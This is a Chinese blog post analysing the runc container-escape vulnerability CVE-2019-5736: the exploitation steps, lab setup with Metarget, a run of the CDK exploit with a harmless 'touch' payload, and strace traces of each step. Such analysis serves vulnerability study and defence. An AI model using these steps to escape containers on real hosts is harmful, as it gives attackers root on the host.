容器逃逸漏洞分析 CVE-2019-5736

最新推荐文章于 2024-01-02 22:55:36 发布
最新推荐文章于 2024-01-02 22:55:36 发布
阅读量1k 收藏 20
点赞数 26
分类专栏: 容器安全 文章标签: 安全 容器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31610083/article/details/135330352
版权

容器逃逸漏洞分析 CVE-2019-5736

一、漏洞基本信息

条目详情备注
发布日期2019-02-12
CVE-IDCVE-2019-5736
CVE Detailshttps://www.cvedetails.com/cve/CVE-2019-5736
影响范围runc <= 1.0-rc6(或Docker < 18.09.2)
修复版本Docker 18.09.2
CVSS8.6 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:HCNVD-CVE20195736

二、漏洞简介

Docker、containerd或其他基于runc的容器运行时存在安全漏洞。攻击者可以通过特定的容器镜像或exec操作获取到宿主机runc执行时的文件句柄并以覆写方式篡改runc二进制文件,从而获取宿主机root权限。

三、前置知识

runc运行过程

runc启动并加入到指定容器的命名空间,接着以自身(“”/proc/self/exe")为范本启动一个子进程,最后通过exec系统调用执行用户指定的二进制程序。

/proc/[PID]/exe

一种特殊的符号链接,又被称为magiclinks,指向进程自身对应的本地程序文件(例如我们执行ls,/proc/[PID]/exe就指向/bin/ls)。其特殊之处在于,当打开这个文件时,在权限检查通过的情况下,内核将直接返回一个指向该文件的描述符,而非以传统打开方式去做路径解析和文件查找,绕过了mnt命名空间及chroot对进程可访问路径的限制。

四、漏洞利用路径

  1. 将容器内的/bin/sh程序覆盖为#!/proc/self/exe
  2. 持续遍历容器内/proc目录,读取每一个/proc/[PID]/cmdline,对runc做字符匹配,直到找到runc进程号
  3. 以只读的方式打开/proc/[runc-PID]/exe,拿到文件描述符fd
  4. 持续以写方式打开只读fd,直到runc结束占用后,写方式打开成功,通过该fd向宿主机的/usr/bin/runc写入攻击载荷
  5. runc最后将执行用户通过docker exec执行的/bin/sh。因为第一步,实际将执行宿主机上的runc,而runc也以及在第四步被覆盖掉

五、漏洞复现和行为分析

环境搭建

  • ubuntu 18.04
  • docker 18.03.1-ce

metarget一键搭建:

git clone https://github.com/Metarget/metarget.git && cd metarget
apt update && apt install -y python3-pip
pip3 install -r requirements.txt
./metarget cnv install cve-2019-5736 --verbose
#备份runc
cp /usr/bin/docker-runc /usr/bin/docker-runc.bak

利用:

# in host
docker run -it --rm  --cap-add sys_ptrace -v /home/ubuntu/neo:/neo ubuntu:18.04 bash
# in container
cd cdk && ./cdk run CVE-2019-5736 "touch /root/5736-success"
# in host
docker exec -it xxx /bin/sh

行为分析

下面用strace采集漏洞复现时的系统行为。

  1. 将容器内的/bin/sh程序覆盖为#!/proc/self/exe

    264   09:29:30.999970 openat(AT_FDCWD, "/bin/sh", O_RDWR|O_CREAT|O_TRUNC|O_CLOEXEC, 0666) = 3 <0.000133>
264   09:29:31.000287 fcntl(3, F_GETFL) = 0x8002 (flags O_RDWR|O_LARGEFILE) <0.000006>
264   09:29:31.000456 fcntl(3, F_SETFL, O_RDWR|O_NONBLOCK|O_LARGEFILE) = 0 <0.000006>
264   09:29:31.000634 epoll_ctl(4, EPOLL_CTL_ADD, 3, {EPOLLIN|EPOLLOUT|EPOLLRDHUP|EPOLLET, {u32=1742815448, u64=139790043398360}}) = -1 EPERM (Operation not permitted) <0.000007>
264   09:29:31.000750 fcntl(3, F_GETFL) = 0x8802 (flags O_RDWR|O_NONBLOCK|O_LARGEFILE) <0.000006>
264   09:29:31.000854 fcntl(3, F_SETFL, O_RDWR|O_LARGEFILE) = 0 <0.000072>
264   09:29:31.001034 write(3, "#!/proc/self/exe\n", 17) = 17 <0.000016>
264   09:29:31.001078 close(3)          = 0 <0.000126>

  2. 持续遍历容器内/proc目录,读取每一个/proc/[PID]/cmdline,对runc做字符匹配,直到找到runc进程号

    267   09:29:36.186545 newfstatat(AT_FDCWD, "/proc/270", {st_mode=S_IFDIR|0555, st_size=0, ...}, 0) = 0 <0.000075>
267   09:29:36.186789 openat(AT_FDCWD, "/proc/270/cmdline", O_RDONLY|O_CLOEXEC) = 3 <0.000013>
267   09:29:36.186901 fcntl(3, F_GETFL) = 0x8000 (flags O_RDONLY|O_LARGEFILE) <0.000074>
267   09:29:36.186999 fcntl(3, F_SETFL, O_RDONLY|O_NONBLOCK|O_LARGEFILE) = 0 <0.000091>
267   09:29:36.187112 epoll_ctl(4, EPOLL_CTL_ADD, 3, {EPOLLIN|EPOLLOUT|EPOLLRDHUP|EPOLLET, {u32=1742815448, u64=139790043398360}}) = -1 EPERM (Operation not permitted) <0.000144>
267   09:29:36.187355 fcntl(3, F_GETFL) = 0x8800 (flags O_RDONLY|O_NONBLOCK|O_LARGEFILE) <0.000006>
267   09:29:36.187384 fcntl(3, F_SETFL, O_RDONLY|O_LARGEFILE) = 0 <0.000072>
267   09:29:36.187481 fstat(3, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0 <0.000097>
267   09:29:36.187614 read(3, "docker-runc\0init\0", 512) = 17 <0.000122>
267   09:29:36.187763 read(3, "", 495)  = 0 <0.000080>
267   09:29:36.187868 close(3)          = 0 <0.000106>

  3. 持续以只读的方式打开/proc/[runc-PID]/exe,拿到文件描述符fd

    267   09:29:36.188720 openat(AT_FDCWD, "/proc/270/exe", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied) <0.000267>
267   09:29:36.189198 openat(AT_FDCWD, "/proc/270/exe", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied) <0.000116>
...
267   09:29:36.238363 openat(AT_FDCWD, "/proc/270/exe", O_RDONLY|O_CLOEXEC) = 3 <0.000014>
267   09:29:36.238422 fcntl(3, F_GETFL) = 0x8000 (flags O_RDONLY|O_LARGEFILE) <0.000005>
267   09:29:36.238451 fcntl(3, F_SETFL, O_RDONLY|O_NONBLOCK|O_LARGEFILE) = 0 <0.000006>
267   09:29:36.238479 epoll_ctl(4, EPOLL_CTL_ADD, 3, {EPOLLIN|EPOLLOUT|EPOLLRDHUP|EPOLLET, {u32=1742815448, u64=139790043398360}}) = -1 EPERM (Operation not permitted) <0.000006>
267   09:29:36.238512 fcntl(3, F_GETFL) = 0x8800 (flags O_RDONLY|O_NONBLOCK|O_LARGEFILE) <0.000006>
267   09:29:36.238550 fcntl(3, F_SETFL, O_RDONLY|O_LARGEFILE) = 0 <0.000006>

  4. 持续以写方式打开只读fd,直到runc结束占用后,写方式打开成功,通过该fd向宿主机的/usr/bin/runc写入攻击载荷

    267   09:29:36.238660 openat(AT_FDCWD, "/proc/self/fd/3", O_WRONLY|O_TRUNC|O_CLOEXEC) = -1 ETXTBSY (Text file busy) <0.000104>
267   09:29:36.238875 openat(AT_FDCWD, "/proc/self/fd/3", O_WRONLY|O_TRUNC|O_CLOEXEC) = -1 ETXTBSY (Text file busy) <0.000095>
...
267   09:29:36.268325 openat(AT_FDCWD, "/proc/self/fd/3", O_WRONLY|O_TRUNC|O_CLOEXEC) = 7 <0.000734>
267   09:29:36.269108 fcntl(7, F_GETFL) = 0x8001 (flags O_WRONLY|O_LARGEFILE) <0.000006>
267   09:29:36.269141 fcntl(7, F_SETFL, O_WRONLY|O_NONBLOCK|O_LARGEFILE) = 0 <0.000116>
267   09:29:36.271453 epoll_ctl(4, EPOLL_CTL_ADD, 7, {EPOLLIN|EPOLLOUT|EPOLLRDHUP|EPOLLET, {u32=1742815448, u64=139790043398360}}) = -1 EPERM (Operation not permitted) <0.000112>
267   09:29:36.271684 fcntl(7, F_GETFL) = 0x8801 (flags O_WRONLY|O_NONBLOCK|O_LARGEFILE) <0.000084>
267   09:29:36.271869 fcntl(7, F_SETFL, O_WRONLY|O_LARGEFILE) = 0 <0.000073>
267   09:29:36.272047 write(7, "#!/bin/bash \n touch /root/5736-s"..., 38) = 38 <0.000101>

  5. runc最后将执行用户通过docker exec执行的/bin/sh。因为有第一步的替换,实际执行的是宿主机上替换过的sh,而runc也在第四步被覆盖掉

    13910 09:29:35.889416 execve("/usr/bin/docker", ["docker", "exec", "-it", "d4cf", "/bin/sh"], 0x7ffe2f6b90e8 /* 30 vars */) = 0 <0.000178>

六、总结

本文详细分析了基于runc覆写的经典容器逃逸漏洞(CVE-2019-5736),从理论分析漏洞利用路径到用strace采集具体的执行步骤,对该漏洞每一步的原理和行为进行剖析。

七、参考链接

  1. Breaking out of Docker via runC – Explaining CVE-2019-5736 (paloaltonetworks.com)
  2. CDK/pkg/exploit/docker_runc.go at main · cdk-team/CDK (github.com)
根本不是咖啡猫
关注
  • 26
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
技术干货 | Docker 容器逃逸案例汇集
08-02 2万+
当获得一个Webshell,我们的攻击点可能处于服务器的一个虚拟目录里,一台虚拟机或是一台物理机,甚至是在一个Docker容器里。 假设,我们获取的Webshell就处于Docker容器里,那么,我们该如何破局呢? Docker 容器逃逸案例: 1、判断是否处于docker容器里 2、配置不当引起的逃逸 Docker Remote API 未授权访问 docker.s...
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-2019-11708诱骗父流程浏览到任意URL。 在过去的中,我已经介绍了CVE-2019-9810的根本原因和利用文章以及相关的。 CVE-2019-11708已由公告,并在Mozilla错误跟踪器中分配了Bug 1559858 。 这是问题的摘要: Insufficient vetting of p
2021-10-21
qq_41124664的博客
10-21 314
## 关于云原生开源靶场Metarget安装失败的问题 问题描述:尝试./metarget cnv install cve-2019-5736 结果出现 error: failed to install prerequisites error: failed to install cve-2019-5736 解决: 该命令需要root权限 sudo ./metarget cnv install cve-2019-5736 ...
容器逃逸Docker runc(CVE-2019-5736)漏洞复现与分析
SHELLCODE_8BIT的博客
08-08 897
【代码】Docker runc(cve-2019-5736)漏洞复现与分析
docker逃逸漏洞复现(CVE-2019-5736)
weixin_45540609的博客
08-10 155
https://www.freebuf.com/articles/web/258398.html
新近爆出的runC容器逃逸漏洞,用户如何面对?
weixin_33912445的博客
02-13 208
runC是一个根据OCI(Open Container Initiative)标准创建并运行容器的CLI工具,目前Docker引擎内部也是基于runc构建的。 2019年2月11日,研究人员通过oss-security邮件列表(https://www.openwall.com/list... )披露了runc容器逃逸漏洞的详情,根据Ope...
Docker 容器逃逸漏洞 (CVE-2020-15257)
12-26 2万+
漏洞简述: 当在docker使用–net=host参数启动,与宿主机共享net namespace时,容器中的攻击者可以绕过访问权限访问 containerd 的控制API 进而导致权限提升。 漏洞利用: (1)安装有漏洞的containerd版本,影响版本containerd< 1.3.9&&containerd < 1.4.3 #列出仓库中可用的版本,安...
docker容器_Docker 容器逃逸漏洞
weixin_35207054的博客
12-27 198
2020年12月1日,阿里云应急响应中心监测到 containerd 官方发布安全更新,修复了 Docker 容器逃逸漏洞(CVE-2020-15257)。漏洞描述Containerd 是一个控制 runC 的守护进程,提供命令行客户端和 API,用于在一个机器上管理容器。在特定网络条件下,攻击者可通过访问containerd-shim API,从而实现Docker容器逃逸。阿里云应急响...
容器逃逸漏洞CVE-2020-15257
weixin_45540609的博客
08-10 169
https://www.cnblogs.com/xiaozi/p/14193869.html https://mp.weixin.qq.com/s/8Zel4oPXdctUE1kotti8Yw
容器逃逸漏洞分析 DirtyPipe脏管 CVE-2022-0847
最新发布
weixin_31610083的博客
01-02 1015
本文详细分析了一个基于内核漏洞的经典容器逃逸漏洞CVE-2022-0847),也就是著名的“脏管”漏洞,从理论分析漏洞利用路径到用strace采集具体的执行步骤,对该漏洞每一步的原理和行为进行剖析。
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
【转】Docker逃逸那些事儿
tpriwwq的专栏
06-02 606
Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。通过利用某种手段,再结合执行EXP或POC,就可以返回一个宿主机的高权限shell,并拿到宿主机的root权限,可以直接操作宿主机文件,从容器中逃了出来,因此我们将其称为Docker逃逸漏洞
相关程序漏洞导致的容器逃逸
maoguan121的博客
10-28 319
CVE-2019-5736 正是这样一个存在于 runC 的容器逃逸漏洞,它由波兰 CTF 战队 Dragon Sector 在 35C3 CTF 赛后基于赛中一道沙盒逃逸题目获得的启发,对 runC 进行漏洞挖掘,成功发现的一个能够 覆盖宿主机 runC 程序的容器逃逸漏洞。在成功触发漏洞后,攻击者可以获得宿主机 上反弹过来的 Shell,实现容器逃逸。“镜像漏洞利用”指的是镜像本身存在漏洞时,依据镜像创建并运行的容器也通常会存在相同漏洞, 攻击者利用镜像中存在的漏洞去攻击容器,往往具有事半功倍的效果。
发现一款容器逃逸漏洞利用神器!
热门推荐
12-28 4万+
有在关注容器逃逸漏洞,最近在github上发现了一款零依赖Docker/K8s渗透工具包,集成了多个漏洞PoC/EXP,可轻松逃脱容器并接管K8s集群。CDK- 零依赖Docker/K8...
[漏洞分析] CVE-2022-0492 容器逃逸漏洞分析
Breeze的博客
03-11 1万+
CVE-2022-0492 容器逃逸分析 文章目录CVE-2022-0492 容器逃逸分析漏洞简介环境搭建漏洞原理与相关知识漏洞发生点cgroup 简介cgroup 使用release_agentunshare 命令漏洞利用利用条件漏洞利用获得CAP_SYS_ADMINmount cgroup与获取容器在宿主机中的路径修改release_agent 触发逃逸exp缓解措施参考 漏洞简介 漏洞编号: CVE-2022-0492 漏洞产品: linux kernel - cgroup 影响版本: ~linux
一个内核网络漏洞详解|容器逃逸
极客重生
08-16 949
CVE-2021-22555:一个影响2006年(Linux kernel v2.6.19-rc1 发布)至今(Linux kernel v5.12-rc8)的所有Linux内核版本的漏洞...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-144391
07-14
你提到的 Jackson 最新反序列化漏洞CVE-2019-14361 和 CVE-2019-14439。这些漏洞都是与 Jackson 库中的反序列化功能相关的安全问题。 CVE-2019-14361 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.9.x 版本。 CVE-2019-14439 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.6.x 至 2.9.x 版本。 为了解决这些漏洞,建议开发人员尽快升级到最新版本的 Jackson-databind 库。另外,还可以考虑限制反序列化操作的使用,以减少潜在的风险。记住及时关注安全公告,并采取相应的措施来保护应用程序免受可能的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值